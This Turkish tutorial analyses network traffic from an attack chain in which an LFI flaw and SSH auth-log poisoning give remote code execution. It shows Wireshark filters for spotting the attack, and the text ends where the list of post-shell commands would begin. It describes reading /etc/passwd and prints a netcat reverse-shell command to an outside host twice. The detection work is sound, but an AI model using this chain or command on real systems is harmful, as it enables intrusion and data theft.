LFI’dan RCE’ye Trafik Analizi

Bu yazımızda LFI’dan RCE elde etme zafiyetinin trafik analizini ele alacağız.

include.php sayfasının görüntülenmesinde dolayı page parametresinde LFI (local file inclusion ) zafiyeti olduğu düşünülmektedir.

Bu aşamada page parametresine /etc/passwd değeri belirtilerek /etc/passwd görüntülenmeye çalışılmış ve başarılı olunmuştur.

Bir sonraki aşamada LFI zafiyeti kullanılarak /var/log/auth.log görüntülenmeye çalışılmıştır. Ve başarılı bir şekilde görüntülendiği gözlemlenmiştir.

Bu aşamada ssh ifadesinde kullanıcı adı alanına girilen değerin auth logunda gözlemlenebileceği düşünülerek kullanıcı adı alanına basit bir php shell yazılmıştır.

Böylece ssh log poisoning işlemi başarılı olmuştur.

Auth.logta yer alan php shell LFI aracılığıyla RCE zafiyetine dönüştürülmüş ve id komutu çalıştırılmıştır.

Id komutundan sonra ise /bin/nc 10.10.10.10 6666 –e /bin/bash komutu çalıştırılarak reverse shell alındığı ve sırayla whoami,cat /etc/passwd komutları çalıştırıldığı gözlemlenmiştir.

Trafik analizi için http filtresini uygulayalım.

Page parametresinde LFI olduğunu düşünerek URI’de page geçen istekleri tespit etmek için aşağıdaki filtreyi kullanabiliriz.

http.request.uri contains “page”

En son istekte /var/log/auth.log log dosyasına LFI zafiyeti ile erişilmiş ve dosya içinde yer alan php shell aracılığıyla /bin/nc 10.10.10.10 6666 –e /bin/bash komutu çalıştırılarak reverse shell alınmıştır.

Şimdi ise reverse shell alındıktan sonra hangi komutların çalıştırıldığını tespit edelim. Bunun için aşağıdaki filtreler kullanılabilir:

tcp.port==6666 and tcp.flags.ack==1 and tcp.flags.push==1 (port bilindiği için)

tcp.flags.ack==1 and tcp.flags.push==1 (port bilinmiyorsa)

Shell alındıktan sonra çalıştırılan komutlar aşağıdaki şekildedir: